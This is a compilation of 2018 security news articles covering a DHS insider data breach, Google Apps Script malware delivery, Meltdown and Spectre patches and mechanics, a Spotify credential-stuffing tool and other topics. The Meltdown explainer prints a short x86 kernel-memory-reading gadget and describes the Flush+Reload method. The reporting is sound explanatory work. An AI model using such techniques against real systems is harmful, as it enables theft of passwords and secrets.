STE WILLIAMS

DHS Discovers Privacy Incident Involving Former Employee

Former DHS OIG employee makes an unauthorized copy of PII data of DHS employees and parties involved in DHS OIG investigations.

A former employee of the Department of Homeland Security’s Office of the Inspector General (OIG) had an unauthorized copy of the DHS OIG investigative case management system, which contained the personally identifiable information of 247,167 current and former DHS workers and also parties involved in DHS OIG investigation cases.

DHS OIG discovered the privacy incident on May 10, while conducting an ongoing criminal investigation with the US Attorney’s Office, reports the DHS. It does not appear the unauthorized copy of the PII was the primary target of the former DHS OIG employee, the DHS notes.

The privacy incident affected two groups. One group included nearly a quarter million DHS workers who were with the agency in 2014. The second group involved individuals associated with DHS OIG investigations, such as witnesses and parties who lodged complaints, from 2002 to 2014.

Although DHS was able to notify affected employees who were with the agency in 2014, it could not reach individuals who were associated with DHS OIG investigations between 2002 to 2014 due to technological limitations, according to DHS. As a result, it is asking these individuals to contact AllClear ID at (855) 260-2767 for 18 months of free credit monitoring and identity protection services. A similar offering is being made to the 247,167 DHS workers.

Read more about the DHS OIG privacy incident here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/dhs-discovers-privacy-incident-involving-former-employee-/d/d-id/1330748?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Google Apps Script Vulnerability Exposes SaaS to URL-based Threats

A new means of exploiting Google Apps Script lets attackers deliver malware using URLs.

Google Apps Script is vulnerable to exploits that could allow malware to be delivered via URLs. Attackers could automatically download arbitrary malware hosted in Google Drive to a machine — and the victim would have no idea it was happening.

Researchers at Proofpoint discovered the vulnerability earlier this year while exploring the potential for abuse of Google services. Ryan Kalember, senior vice president of cybersecurity strategy at Proofpoint, points to Carbanak’s use of Google for CC as a public example of this.

Google Apps Script is a development platform based on JavaScript that lets developers build standalone web apps and extensions for various parts of the Google Apps ecosystem. Researchers learned this platform, as well as document sharing capabilities in Google Apps, support automatic malware downloads and advanced social engineering attacks designed to manipulate victims into executing malware once it’s on their machine.

“What we’re seeing is [changes in] the style of attack — normally a phishing email followed by social engineering a user to click on something,” Kalember says. “Attackers are infinitely varying that.”

This type of attack is different from phishing and malware distribution via links to Google Drive URLs, which are fairly common. These normally involve sending a Microsoft Office doc, which is enabled to run macros when the user gives permission.

In this case, all the activity happens in Google: a victim opens a link to edit a Google Doc and is prompted to run a Google Apps Script, which is embedded in the document. Most people say yes and deliver the malware, which can be hosted somewhere else within Google Drive, Kalember explains. It’s a variation of what we see with Office macros; the Doc itself is simply a way for someone to run code when it’s opened.

“It would be very, very difficult to detect anything malicious,” Kalember says. “Someone could do this in a direct way: craft the URL and send the script to the victim. The Google domain is basically a trust vehicle in that case.”

To explore this vulnerability, researchers began by uploading malicious files to Google Drive. Attackers could create a public link to these executables, and share an arbitrary Google Doc to use as a lure and vehicle for a Google Apps Script designed to deliver the shared malware.

“What we’re seeing on the Google Docs side is these little scripts can be in the Doc itself, or they can be downloaded and the user can be socially engineered into running them,” says Kalember.

The ability for attackers to use extensible SaaS platforms for delivering malware is comparatively more powerful than the ability to use Microsoft Office macros for distribution, researchers report. Companies don’t have many options for defensive tools to protect against this type of threat, increasing the likelihood attackers will exploit SaaS platforms.

“This is really, really powerful stuff that Google builds from a scripting perspective, so you can do almost anything with it,” says Kalember of Google Apps Scripts. Further, most of this activity bypasses traditional security defense mechanisms.

Proofpoint disclosed this vulnerability to Google in the fall of 2017; since then, the company has added restrictions on Google Apps Script events that could be exploited. It blocked installable triggers, or customizable events causing events to automatically occur. It also blocked simple triggers from presenting custom interfaces in Docs editors in other users’ sessions.

These restrictions block phishing and malware delivery attempts that are triggered by opening a document, meaning exploits can no longer be leveraged for mass infections. This could have been possible before Google introduced these changes, says Kalember.

This exploit demonstrates how software-as-a-service (SaaS) applications are increasingly threatened by attackers looking for new opportunities to distribute malware and steal data.

“SaaS platforms remain something of a ‘Wild West’ for threat actors and defenders alike,” says Maor Bin, Proofpoint’s security research lead for threat systems products, in a statement. Capabilities like Google Apps Script are creating opportunities for threat actors who can leverage vulnerabilities for good or bad, using legitimate features for nefarious purposes.

Because victims in these scenarios receive legitimate links to edit Google Docs, as many people do, the same rules of email security apply. Users should also use caution when clicking links to Google Docs, unless they know or can verify the sender. Businesses using G Suite have access to tools which tell them which scripts are out there, which can help awareness.

“In the future it might be useful for Google to try and ascertain whether a script is malicious or not before allowing a user to run it, or even host it on G Suite,” says Kalember. “Now, it’s challenging to tell whether a script is malicious or not.”

Related Content:

Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Article source: https://www.darkreading.com/cloud/google-apps-script-vulnerability-exposes-saas-to-url-based-threats/d/d-id/1330749?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Vendors Rush to Issue Security Updates for Meltdown, Spectre Flaws

Apple says all Mac and iOS systems are affected by new side-channel attack vulnerabilities.

[UPDATED 7:20pm ET with Apple’s statement]

Wondering what to do in the wake of the revelation of newly discovered critical design flaws in most modern microprocessors? Security experts say the best bet is to apply patches for the side-channel attack vulnerabilities, which were disclosed this week. 

The vulnerabilities impact a wide number of products from numerous vendors, though not always with the same level of severity. Also impacted are servers, and in many cases the underlying infrastructure hosting cloud services. Vendors and security analysts have urged all organizations and customers to apply patches, OS updates, and other workarounds as soon as they become available, regardless of the severity of impact.

“Generally speaking, the patches to fix this move the balance back towards security,” said Paul Ducklin, senior security advisor at Sophos.

The catch, however is that some of the fixes could reduce performance a bit, he said.  “Sometimes, the price of security progress is a modicum of inconvenience. In this case, the updates might slow you down a tiny bit, but think of it as being for the greater good of all,” he noted.

Here’s a rundown of vendors that have released, or are working on, patches for the vulnerabilities, aka Meltdown and Spectre.

Intel

Intel has acknowledged the issue but said it doesn’t believe the exploits have the potential to corrupt, modify, or delete data. The processor vendor claimed that many computing devices from other vendors are susceptible to the same so-called speculative execution side-channel attacks.

As of Jan 4, Intel has developed or is developing updates for all Intel-based PCs and servers to address problems caused by the Spectre and Meltdown exploits. The chipmaker said it hopes to have updates for 90% of its processor products introduced over the last five years, by the end of next week. The company has urged administrators and end users to check with their OS and hardware vendors and apply the updates as soon as they become available.

More details here. 

Google

According to Google, the issue has already been mitigated in many of its affected products, or wasn’t a vulnerability at all in the first place. Among its affected products are the following:

Android

Google’s monthly security update for January 2018 contains fixes for the new exploits.  Specifically, the company’s Android 2018-01-05 Security Patch Level includes mitigations that limit attacks on all Intel and known variants of ARM processors according to the company.

Google wants users of all Google-supported Android devices such as the Nexus 5X, Nexus 6P, Pixel C, Pixel/XL, and Pixel 2/XL to accept and install the latest security update on their devices.

Chrome

Users and administrators of current stable versions of Chrome need to enable the browser’s Site Isolation feature to protect against the threat. The feature isolates websites on different browser tabs into separate address spaces to minimize fallout from security incidents.

Information on Site Isolation and how to enable it are available here. Enterprises that want to set Site Isolation by policy on Chrome desktops can learn how to do that here.

More details here. 

Microsoft

Microsoft has released several updates to address problems caused by the vulnerabilities. Customers and organizations that have enabled automatic Windows security updates will get the fixes with Microsoft’s January 2018 patch release. Microsoft said users who have not enabled automatic updates should manually install the fixes as soon as possible. According to the company, in order for customers to be fully protected against speculative execution side-channel attacks, they may also need to install hardware and firmware updates from device vendors and in some cases from their antivirus vendors as well. Affected products include multiple versions of Windows, Windows Server, Microsoft Edge, and Internet Explorer.

More details here.  

Amazon

Amazon said that all but a single-digit percentage of its underlying cloud infrastructure systems are already protected against the three vulnerabilities.

Updates for the remaining systems will be available soon along with associated guidance on how to implement them. Updates are available for Amazon Linux and those for EC2 Windows will be made available as Microsoft patches become available.

Amazon’s updates are designed to fix underlying infrastructure issues. “In order to be fully protected against these issues, customers must also patch their instance operating systems,” the vendor said.

More details here. 

Apple

Apple was one of the last vendors to announce its patching plans. Late today, Apple said in a post that all Mac systems and iOS devices are affected by the vulnerabilities, but that it knows of no exploits “impacting customers at this time.”

The vendor said it released mitigations for Meltdown in iOS 11.2, MacOS 10.13.2, and tvOS 11.2 to help defend against Meltdown, and that Apple Watch is not impacted by that vuln. As for Safari, Apple will issue an update with mitigations against Spectre in “the coming days.”

“We continue to develop and test further mitigations for these issues and will release them in upcoming updates of iOS, macOS, tvOS, and watchOS,” Apple said in its statement here. 

Mozilla

As of Jan 4, Mozilla said it was working with security researchers to understand the full impact of the newly announced vulnerabilities and to find fixes for them. In the meantime, the browser maker has implemented a short-term mitigation by disabling or, in some cases reducing the precision of, certain timers in its Firefox browser. The browser maker said it was taking the measure “since [the] new class of attacks involves measuring precise time intervals.”

“In the longer term, we have started experimenting with techniques to remove the information leak closer to the source, instead of just hiding the leak by disabling timers,” Mozilla said on its blog.

More details here.

AMD 

A January 3 CMU CERT alert identified AMD’s products as being impacted by the newly discovered vulnerabilities. However, the chipmaker downplayed the severity of the threat and said its investigation showed little impact on AMD products. In an update, AMD said the Bounds check bypass vulnerability (CVE-2017-5753) and the Branch Target Injection Vulnerability (CVE-2017-5715) had only a negligible to near-zero performance impact on AMD’s processors. Similarly, the Rogue Data Cache Load flaw (CVE-2017-5754) had zero-impact due to “AMD architecture differences,” the company has noted.

AMD has not released any security fixes as of Jan. 4, and has said that any impact on its processors should be resolved via third party OS and software updates.

More details here. 

ARM

Most ARM processors are not impacted by the side-channel vulnerabilities, according to the mobile chip designed. It has released a complete list of “the small subset” of all ARM-designed processors that are susceptible. Among the 10 processors impacted by at least one of the three side-channel vulnerabilities are the Cortex R7 and R8, Cortex A8, A9 and A15 and Cortex A73 and A75.

ARM has listed various actions Linux users can take to mitigate the threat in each of the affected processors. It has instructed users running Android to contact Google.

More details here. 

Red Hat

Red Hat has released a list of all affected versions of its Linux software and said it considers the newly announced vulnerabilities as having an “Important” security impact on its products. “While Red Hat’s Linux Containers are not directly impacted by kernel issues, their security relies upon the integrity of the host kernel environment. Red Hat recommends that you use the most recent versions of your container images,” it said.

The company said it is actively developing scripts to help users understand the impact of the vulnerabilities on their specific systems. It has released security patches for many versions of its Enterprise Linux and is working on updates for the remaining ones. It has urged users to apply the updates as soon as they become available because no other mitigations are available for the vulnerabilities.

More details here.  

SUSE

SUSE has released patches for most of its recent SUSE Linux Enterprise versions. Patches for the remaining versions will become available shortly, according to the company. SUSE has rated the three vulnerabilities as being of “critical” severity to its affected products and has set up a site that gives users continuous updates on patches as they become available.

More details here. 

VMWare

VMWare has released updates for its VMware ESXi, Workstation, and Fusion technologies. The company has rated the threat presented by the three vulnerabilities as being of “important” severity. “Result of exploitation may allow for information disclosure from one Virtual Machine to another Virtual Machine that is running on the same host,” the company said.

More details here. 

Related Content:

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/informationweek-home/vendors-rush-to-issue-security-updates-for-meltdown-spectre-flaws/d/d-id/1330753?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Social media namer and shamer charged

An 18-year-old woman in the UK has been charged with publishing the names of two sexual assault victims onto social media.

A local publication, Liverpool Echo, reports that Sophie Turner, of Merseyside, has been charged with two counts of publishing the names of the victims of a sexual offense and with two counts of harassment.

Turner allegedly posted messages in July about two victimized teenage girls following the sentencing of the two men who assaulted them. She’s now out on bail and due to appear at Liverpool Magistrates Court on 7 March.

The Echo says this is the first time somebody’s been charged with this particular crime in Merseyside, but it’s not the first time it’s happened in the UK.

One such was the infamous rape case for which footballer Ched Evans was convicted in 2012 (a conviction overturned on subsequent retrial). Ten people were accused of naming the victim on social media, including on Facebook and Twitter.

According to The Guardian, some of the defendants said the victim was “crying rape” and called her names. One tweet read: “She is to blame for her own downfall. Let’s find her address.”

As in many other countries, publicly naming rape victims is illegal in the UK. Victims of sexual assault are entitled to anonymity for life under the Sexual Offences Act 2003. It’s not just verboten for media; anyone can be convicted for identifying a victim.

The rationale for keeping victims’ names secret is that sex crimes are already widely under-reported: in 2012, the British Crime Survey found that about 89% of rape victims hadn’t reported the crime to police. What’s more, the conviction rate is vanishingly small: a recent documentary on rape reported that only 3% of rapes in the UK end with a guilty conviction. Victims claim that they’re blamed for the crime or simply not believed. Anonymity is one way to battle the victim-blaming and slut-shaming that keep the crimes unreported and the criminals out of court.

But being tried and convicted by a village mob on social media affects a far more diverse collection of people, above and beyond sexual assault victims. Victims themselves have, most particularly in these post-Harvey Weinstein times, taken to social media to name their attackers, often in lieu of reporting the crimes to the police.

As Vice has reported, that does both the accused and the accuser a vast array of disservice: the accused have been harassed, without the chance to answer their accusers in a court of law. The accusers, by skipping over anonymity and a police report and by publishing their accounts, jeopardize their chances of getting an untainted jury if the case makes it to court.

Overexposure on social media has even turned an innocent, dweeby dad into a pariah: the “creep” who was shamed on Facebook for allegedly taking photos of children in a mall (he was actually taking a selfie with a Darth Vader cutout to show his kids) comes to mind.

…and after the truth came out, the woman who shamed him was herself turned into a pariah.

Sometimes – at least where Facebook, Twitter and the rest are concerned – silence is golden. Sometimes, if not most times, and for a range of reasons, it’s best to keep people’s names, their photos and our assumptions off social media.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/gjeJ84_JHXU/

US Homeland Security breach compromised personal info of 200,000+ staff

More than 240,000 current and former employees of the US Department of Homeland Security have had their personal details exposed in a data breach.

In what it describes somewhat euphemistically as a “privacy incident”, the DHS said the breach could also affect anyone who was part of an investigation by the DHS Office of Inspector General between 2002 and 2014.

The breach was discovered in May 2017, when – as part of an ongoing criminal investigation – the DHS found a former employee had an unauthorised copy of the office’s investigative case management system.

The DHS was at pains to emphasise that the “evidence indicates that… personal information was not the primary target” and that the incident wasn’t a “cyber attack by external actors”.

But it still led to the unauthorised transfer of the personally identifiable information – including name, social security number and position – of 246,167 federal government staff employed by the DHS in 2014.

On top of that, it affects an undefined number of people that were under investigation by the office between 2002 and 2014 – this could be subjects, witnesses and complainants, and is not limited to DHS employees. That information could include name, social security number, address, phone number and date of birth.

Current and former staff were contacted on December 18, 2017, but the department said it was “unable to provide direct notice to the individuals affected by the Investigative Data”.

Clearly anticipating the question of why it took them nine months to alert affected individuals after discovering the breach, the DHS’s canned statement said:

The investigation was complex given its close connection to an ongoing criminal investigation. From May through November 2017, DHS conducted a thorough privacy investigation, extensive forensic analysis of the compromised data, an in-depth assessment of the risk to affected individuals, and comprehensive technical evaluations of the data elements exposed. These steps required close collaboration with law enforcement investigating bodies to ensure the investigation was not compromised.

In a bid to reassure people that this wouldn’t happen again, the department said it was placing “additional limitations” on who gets back end access to case management systems, as well as implementing additional network controls to identify unusual access patterns.

In addition, it said it would be “performing a 360-degree review of DHS OIG’s development practices related to the case management system”.

It added that anyone potentially affected was being offered 18 months of free credit monitoring and identity protection services. ®

Sponsored:
Minds Mastering Machines – Call for papers now open

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/01/04/us_homeland_security_breach_exposed_personal_info_of_200000_staff/

The Internet of (Secure) Things Checklist

Insecure devices put your company at jeopardy. Use this checklist to stay safer.

In October 2016, as a botnet strung together by the Mirai malware launched the biggest distributed denial-of-service attack in history, I was, appropriately enough, giving a talk on Internet of Things (IoT) security and privacy at the Grace Hopper Conference. As I learned of the attack, and as questions came in from the audience about the malware, I knew that the topic of my session could not have been more timely. In this instance, and in countless others, IoT security is a core issue. Security professionals need to be concerned about insecure devices.

More than a year later, IoT continues to be a growing concern. From Internet-connected toaster ovens to smart hairbrushes to popular health trackers, these devices can be risky, especially when used in certain environments. Given the prevalence of these devices coming in and out of corporate networks, not only is it important to be ready to protect your own organization, but it is crucial to understand how far IoT risk can extend. 

As the ATT IoT Cybersecurity Alliance highlighted in a recent white paper, Mirai was a prime example of the type of risk posed by unsecured IoT devices. The obvious threat is exposure of personal data to an attacker who compromises a device. However, according to the report, if the connected devices within your organization are used as part of a widespread attack, your organization could suffer reputational damage or, worse, your organization could be victimized by a compromised IoT device from a business partner.

Just like any type of cyberattack, the implications of an IoT attack are far-reaching. This is why it is important for security professionals to approach IoT security just as they would network, endpoint, and cloud security. A comprehensive cyber hygiene strategy is a necessary component of securing your organization and preventing cyber attacks.

Security teams should review their current priorities and reference this basic IoT security hygiene checklist:

  1. Assess your company’s overall risk acceptance. Every company has a different view of the types of risks they are willing to accept, and it’s critical you understand your company’s overall risk acceptance. This is an important first step, as it will help you determine which devices you will allow to connect and which devices you will need to block. For example, some companies may find it to be low-risk if users connect health-tracking devices to company laptops, allowing them to transfer personal health data. Other companies with a different security posture may find this to be a high risk.
  2. Develop an IoT awareness and training program.  Employees need to be aware of the risk that connected devices present. In order for them to be IoT savvy, they need proper resources and training. An integral part of developing their awareness is making sure they understand how their personal devices are part of the bigger picture and overall security of their workplace — and what is allowed and what is not. Training also should include how to do IoT health checks to determine if devices are secure. It is important to provide employees with the tools needed to protect themselves and the organization, whether that means a required course on IoT risk and cyber hygiene or a video starring the executive staff that demonstrates possible IoT threat scenarios.
  3. Practice what you preach. A personal device hygiene check is always a good reminder about the importance of IoT security. Going through this process yourself will help you figure out what should be included in your company’s IoT hygiene program. I make a habit of regularly checking through the apps on my phone to see what access they have. Many devices request access to photos, location information, and contacts; ask yourself if you want to allow this. Keeping IoT devices up to date and ensuring the proper privacy settings are in place are important steps for securing your own device and for securing the networks and other devices that they connect to, including company laptops and mobile phones.

Gartner predicts that more than 20 billion connected devices will be in operation by 2020, rising from 8.4 billion in 2017. The security investments made by companies creating these billions of devices are just as diverse as the devices themselves. There are some IoT companies investing in a lot in security, while others are focusing only on creating connected devices — and security may be an afterthought. As security practitioners, we should take this into consideration when assessing IoT risk for our organizations and users. There is a lot we can do to ensure we are one step ahead when it comes to IoT security.

Related Content:

Rinki Sethi is Senior Director of Security Operations and Strategy at Palo Alto Networks. She is responsible for building a world-class security operations center that includes capabilities such as threat management, security monitoring, and threat intelligence. Rinki is also … View Full Bio

Article source: https://www.darkreading.com/endpoint/the-internet-of-(secure)-things-checklist/a/d-id/1330689?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Artificial Intelligence to listen for suicidal thoughts on social media

Canada is planning a pilot project to see if Artificial Intelligence (AI) can find patterns of suicidality – i.e., suicidal thoughts or attempts, self-harm, or suicidal threats or plans – on social media before they lead to tragedy.

According to a contract award notice posted by the Public Health Agency of Canada (PHAC), the $99,860 project is being handled by an Ottawa-based AI company called Advanced Symbolics Inc. (ASI). The agency says the company was the only one that could do it, given that ASI has a patented technique for creating randomized, controlled samples of social media users in any geographic region.

The focus on geographic region is key: As it is, the country is reeling after a dramatic spike in suicides in Cape Breton among girls 15 years old and younger and men in their late 40s and early 50s.

The idea isn’t to identify specific individuals at risk of suicide. Nor is it to intervene. Rather, the project’s aim is to spot patterns on a regional basis so that public health authorities can bolster mental health resources to regions that potentially face suicide spikes.

The project is set to begin this month and finish by the end of June, if not before.

First, the PHAC and ASI will work to broadly define these suicide-related behavior terms: ideation (i.e., thoughts), behaviors (i.e., suicide attempts, self-harm, suicide) and communications (i.e., suicidal threats, plans). The next phase will be to use the classifier to research the “general population of Canada” in order to identify patterns associated with users who discuss suicide-related behavior online.

According to CBC News, PHAC says that suicide is the second-leading cause of death for Canadians aged 10 to 19. The news outlet quoted an agency spokesperson:

To help prevent suicide, develop effective prevention programs and recognize ways to intervene earlier, we must first understand the various patterns and characteristics of suicide-related behaviors.

PHAC is exploring ways to pilot a new approach to assist in identifying patterns, based on online data, associated with users who discuss suicide-related behaviors.

Kenton White, chief scientist with ASI, told CBC News that nobody’s privacy is going to be violated.

It’d be a bit freaky if we built something that monitors what everyone is saying and then the government contacts you and said, ‘Hi, our computer AI has said we think you’re likely to kill yourself’.

ASI’s AI will be trained to flag particular regions where suicide may be likely. In Cape Breton, for example, three middle-school students took their lives last year.

White said that there are patterns to be gleaned from Cape Breton’s spike in suicides. The same can be said for patterns that White says have appeared in suicides in Saskatchewan, in Northern communities, and among college students.

ASI CEO Erin Kelly told CBC News that the AI won’t analyze anything but public posts:

We’re not violating anybody’s privacy – it’s all public posts. We create representative samples of populations on social media, and we observe their behavior without disturbing it.

CBC News reports that ASI’s technology could give regions a two- to three-month warning before suicides potentially spike – what could be a vital beacon that government officials could act on by mobilizing mental health resources before the suicides take place.

This isn’t the first time that technology has been applied to suicide prevention. At least as early as 2013, Facebook was working with researchers to put its considerable data mining might to use to try to discern suicidal thoughts by sifting through the social media streams and risk factors of volunteers. Such risk factors include the distinct types of suicide that correlate with factors such as whether the victims were male (making suicide more likely), married (less likely) or childless (more likely).

Facebook and researchers at the Geisel School of Medicine at Dartmouth recruited military veterans as volunteers: a group with a high suicide rate.

At that early stage, Facebook, like HPAC and ASI, didn’t include intervention. The researchers were’t empowered to intervene if suicide or self-harm was flagged.

Since then, Facebook has introduced technologies geared at intervention.

In March 2017, Facebook said it planned to update its algorithms so as to “listen” for people in danger of suicide. The idea was to look out for certain key phrases and then refer the matter to human beings on the Facebook staff, who would then ask whether the writer was OK.

The move followed a similar attempt on Twitter by the Samaritans in 2014. That attempt was aborted in a matter of months as critics lambasted the project’s design due to privacy concerns – it was criticized for enabling stalking, given that users couldn’t opt out.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/seHxp_JVi1Y/

Is your Spotify password up to scratch?

If you’re among the 140 million users who enjoy streaming music from Spotify – especially if you are one of its 60 million paying customers for “premium” services – you might want to make sure you have a strong, long and unique password on your account. If not, you could be letting cybercriminals into your account.

Collective Labs’ Ryan Jackson came across a brute force hacking tool called Spotify Cracker v1 last month, which automatically cycles through known username and password combinations and breaks into Spotify accounts that use those credentials.

17-year-old Jackson, who reportedly has a history of involvement with hacking groups New World Hackers and Lizard Squad, (“while never participating in their antics”), told the International Business Times (IBT) that he found the tool on a private server on Discord – a popular, free online communications platform used primarily by gamers.

And given current Spotify login security protocols – the company doesn’t use CAPTCHAs or offer two-factor authentication (2FA) – it doesn’t meet much resistance. Without mechanisms to lock down an account after a certain number of incorrect password guesses, a brute force attack can simply keep guessing until it is successful.

Hackers can easily collect login credentials – email addresses and passwords – that have been compromised from other breaches and are available on dark web marketplaces, sometimes for free, and then plug in those credentials to find a Spotify account associated with them.

Jackson tried it himself. He found a collection of emails and passwords on Pastebin – the anonymous service that lets people host text for free – and said that it took him about 15 minutes to break into 100 accounts using the tool. He said someone could simply let the tool run all night and wake up to another 20,000 compromised accounts.

Spotify, based in Sweden, didn’t respond to a request for comment, but IBT reported that the company said it had not been breached and that, “our user records are secure.” A spokesperson added:

We do however pay attention to breaches of other services, and take steps to help our users secure their Spotify accounts when those occur, because many people use the same login and password combination for multiple services. Therefore, we review sites such as Pastebin and others for leaked user credentials which might be used to access Spotify.

The company didn’t respond to questions about whether any of those “steps” would include adding more robust security features to its login process.

Still, its lack of login security, even after Collective notified it about Spotify Cracker, has prompted some well-deserved criticism, such as the following tweet from high-profile security blogger Brian Krebs:

CAPTCHAs and 2FA aren’t cutting edge – they’re basic security hygiene that any company with 140 million users ought to have in place.

Until that changes, it’s up to users to protect themselves.

Which means making sure your password is complicated and robust, and not using the same one for any other online account. Here’s a quick video on how to pick a good one:


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/yRKbcUPjmso/

Meltdown, Spectre: The password theft bugs at the heart of Intel CPUs

Summary The severe design flaw in Intel microprocessors that allows sensitive data, such as passwords and crypto-keys, to be stolen from memory is real – and its details have been revealed.

On Tuesday, we warned that a blueprint blunder in Intel’s CPUs could allow applications, malware, and JavaScript running in web browsers, to obtain information they should not be allowed to access: the contents of the operating system kernel’s private memory areas. These zones often contain files cached from disk, a view onto the machine’s entire physical memory, and other secrets. This should be invisible to normal programs.

Thanks to Intel’s cockup – now codenamed Meltdown – that data is potentially accessible, meaning bad websites and malware can attempt to rifle through the computer’s memory looking for credentials, RNG seeds, personal information, and more.

Here’s a video demonstrating a Meltdown attack:

On a shared system, such as a public cloud server, it is possible, depending on the configuration, for software in a guest virtual machine to drill down into the host machine’s physical memory and steal data from other customers’ virtual machines. See below for details on Xen and VMware hypervisor updates.

Intel is not just affected. Arm and AMD processors are as well – to varying degrees. AMD insisted there is a “near-zero” risk its chips can be attacked in some scenarios, but its CPUs are vulnerable in others. The chip designer has put up a basic page that attempts to play down the impact of the bugs on its hardware.

Arm has produced a list of its affected cores, which are typically found in smartphones, tablets and similar handheld gadgets. That list also links to workaround patches for Linux-based systems. Nothing useful from Intel so far.

This is, essentially, a mega-gaffe by the semiconductor industry. As they souped up their CPUs to race them against each other, they left behind one thing in the dust. Security.

We translated Intel’s crap attempt to spin its way out of CPU security bug PR nightmare

READ MORE

One way rival processors differentiate themselves, and perform faster than their competitors, is to rely on speculative execution. In order to keep their internal pipelines primed with computer code to obey, they do their best to guess which instructions will be executed next, fetch those from memory, and carry them out. If the CPU guesses wrong, it has to undo the speculatively executed code, and run the actual stuff required.

Unfortunately, the chips in our desktop PCs, laptops, phones, fondleslabs, and backend servers do not completely walk back every step taken when they realize they’ve gone down the wrong path of code. That means remnants of data they shouldn’t have been allowed to fetch remain in their temporary caches, and can be accessed later.

The trick is to line up instructions in a normal user process that cause the processor to speculatively fetch data from protected kernel memory before performing any security checks. The crucial Meltdown-exploiting x86-64 code can be as simple as…

; rcx = kernel address
; rbx = probe array
retry:
  mov al, byte [rcx]
  shl rax, 0xc
  jz retry
  mov rbx, qword [rbx + rax]

Trying to fetch a byte from the kernel address as a user process triggers an exception – but the subsequent instructions have already been speculatively executed out of order, and touch a cache line based on the content of that fetched byte.

An exception is raised, and handled non-fatally elsewhere, while the out-of-order instructions have already acted on the content of the byte. Doing some Flush+Reload magic on the cache reveals which cache line was touched and thus the content of the kernel memory byte. Repeat this over and over, and eventually you dump the contents of kernel memory.

On Wednesday, following research by a sizable collection of boffins, details of three closely related vulnerabilities involving the abuse of speculative execution in modern CPUs were made public:

  • CVE-2017-5753: Known as Variant 1, a bounds check bypass
  • CVE-2017-5715: Known as Variant 2, branch target injection
  • CVE-2017-5754: Known as Variant 3, rogue data cache load

These have been helpfully grouped into two logo’d and branded vulnerabilities: Meltdown (Variant 3), and Spectre (Variants 1 and 2). Both links go to a website with the full technical papers detailing the attacks if you want to see in gory detail how they work.

There is also a Google Project Zero blog post going over the finer points. Finally, here’s some proof-of-concept exploit code that runs on Windows.

Here’s a summary of the two branded bugs:

  • Meltdown
    • This is the big bug reported on Tuesday.
    • It can be exploited by normal programs to read the contents of private kernel memory.
    • It affects potentially all out-of-order execution Intel processors since 1995, except Itanium and pre-2013 Atoms. It definitely affects out-of-order x86-64 Intel CPUs since 2011. There are workaround patches to kill off this vulnerability available now for Windows, and for Linux. Apple’s macOS has been patched since version 10.13.2. Installing and enabling the latest updates for your OS should bring in the fixes. You should go for it. If you’re a Windows Insider user, you’re likely already patched. Windows Server admins must enable the kernel-user space splitting feature once it is installed; it’s not on by default.
    • Amazon has updated its AWS Linux guest kernels to protect customers against Meltdown. Google recommends its cloud users apply necessary patches and reboot their virtual machines. Microsoft is deploying fixes to Azure. If you’re using a public cloud provider, check them out for security updates.
    • The workarounds move the operating system kernel into a separate virtual memory space. On Linux, this is known as Kernel Page Table Isolation, or KPTI, and it can be enabled or disabled during boot up. You may experience a performance hit, depending on your processor model and the type of software you are running. If you are a casual desktop user or gamer, you shouldn’t notice. If you are hitting storage, slamming the network, or just making a lot of rapid-fire kernel system calls, you will notice a slowdown. Your mileage may vary.
    • It also affects Arm Cortex-A75 cores. Qualcomm’s upcoming Snapdragon 845 is an example part that uses the A75. There are Linux kernel KPTI patches available to mitigate this. The performance hit isn’t known, but expected to be minimal.
    • Additionally, Cortex-A15, Cortex-A57 and Cortex-A72 cores suffer from a variant of Meltdown: protected system registers can be accessed, rather than kernel memory, by user processes. Arm has a detailed white paper and product table, here, describing all its vulnerable cores, the risks, and mitigations.
    • Meltdown does not affect any AMD processors.
    • Googlers confirmed an Intel Haswell Xeon CPU would allow a normal user program to read kernel memory.
    • It was discovered and reported by three independent teams: Jann Horn (Google Project Zero); Werner Haas, Thomas Prescher (Cyberus Technology); and Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz (Graz University of Technology).
  • Spectre
    • Spectre allows, among other things, user-mode applications to extract information from other processes running on the same system. Alternatively, it can be used by code to extract information from its own process. Imagine malicious JavaScript in a webpage churning away using Spectre bugs to extract login cookies for other sites from the browser’s memory.
    • It is a very messy vulnerability that is hard to patch, but is also tricky to exploit. It’s hard to patch because just installing the aforementioned KPTI features is pointless on most platforms – you must recompile your software with countermeasures to avoid it being attacked by other programs, or wait for a chipset microcode upgrade. There are no solid Spectre fixes available yet for Intel and AMD parts.
    • In terms of Intel, Googlers have found that Haswell Xeon CPUs allow user processes to access arbitrary memory; the proof-of-concept worked just within one process, though. More importantly, the Haswell Xeon also allowed a user-mode program to read kernel memory within a 4GB range on a standard Linux install.
    • This is where it gets really icky. It is possible for an administrative user within a guest virtual machine on KVM to read the host server’s kernel memory in certain conditions. According to Google:

      When running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM.

    • AMD insists its processors are practically immune to Variant 2 Spectre attacks. As for Variant 1, you’ll have to wait for microcode updates or recompile your software with forthcoming countermeasures described in the technical paper on the Spectre website.
